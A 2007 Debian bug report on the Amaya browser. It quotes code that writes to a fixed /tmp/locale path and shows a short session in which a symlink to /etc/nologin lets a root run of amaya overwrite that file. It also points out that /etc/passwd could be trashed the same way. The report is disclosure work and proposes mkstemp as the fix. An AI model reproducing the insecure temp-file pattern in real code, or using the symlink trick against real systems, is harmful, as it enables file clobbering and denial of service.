Bug#431600: amaya: Insecure use of temporary files allows arbitary file trunaction/creation

Tue, 03 Jul 2007 11:48:52 -0700 

Package: amaya
Version: 9.54~dfsg.0-1
Severity: important


  The Amaya package contains the following code inside 
 amaya-9.51/Amaya/thotlib/unicode/ustring.c

        {
          int  fd;
          char buffer[256];
          memset ( buffer, 0, 256 );
          /* ask the system using locale command */
          system ("locale -ck LC_MESSAGES | grep messages-codeset | sed 
's/.*=\"//' | sed 's/\"//' > /tmp/locale");
          fd = open ("/tmp/locale", O_RDONLY);


  This can be abused to allow arbitary files to be created, or truncated,
 when a user runs the browser as this session shows:

  # check there are no files, then create an evil symlink
[EMAIL PROTECTED]:~$ ls -l /etc/nologin /tmp/locale
ls: /etc/nologin: No such file or directory
ls: /tmp/locale: No such file or directory
[EMAIL PROTECTED]:~$ ln -s /etc/nologin /tmp/locale

 # wait for root to run the application
[EMAIL PROTECTED]:~$ sudo -s
[EMAIL PROTECTED]:~# amaya 

 # see the file
[EMAIL PROTECTED]:~# ls /etc/nologin 
/etc/nologin
[EMAIL PROTECTED]:~# cat /etc/nologin
UTF-8

  Obviously this example relies upon root to run the application and  linking
 to /etc/passwd would trash the system.

  I guess the solution is to generate a secure temporary filename with 
 mktemp, mkstemp, or similar..

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.18-xen (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages amaya depends on:
ii  amaya-data              9.54~dfsg.0-1    Web Browser, HTML Editor and Testb
ii  libc6                   2.5-11           GNU C Library: Shared libraries
ii  libexpat1               1.95.8-3.4       XML parsing C library - runtime li
ii  libfreetype6            2.2.1-6          FreeType 2 font engine, shared lib
ii  libgcc1                 1:4.2-20070627-1 GCC support library
ii  libgl1-mesa-glx [libgl1 6.5.2-5          A free implementation of the OpenG
ii  libglu1-mesa [libglu1]  6.5.2-5          The OpenGL utility library (GLU)
ii  libjpeg62               6b-13            The Independent JPEG Group's JPEG 
ii  libpng12-0              1.2.15~beta5-2   PNG library - runtime
ii  libraptor1              1.4.15-3         Raptor RDF parser and serializer l
ii  libstdc++6              4.2-20070627-1   The GNU Standard C++ Library v3
ii  libwww-ssl0             5.4.0-11         The W3C-WWW library (SSL support)
ii  libwxbase2.6-0          2.6.3.2.1.5      wxBase library (runtime) - non-GUI
ii  libwxgtk2.6-0           2.6.3.2.1.5      wxWidgets Cross-platform C++ GUI t
ii  ttf-freefont            20060501cvs-12   Freefont Serif, Sans and Mono True
ii  zlib1g                  1:1.2.3.3.dfsg-3 compression library - runtime

Versions of packages amaya recommends:
pn  amaya-doc                     <none>     (no description available)

-- no debconf information

Steve
--
#  Kink-Friendly Dating
http://ctrl-alt-date.com/



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Reply via email to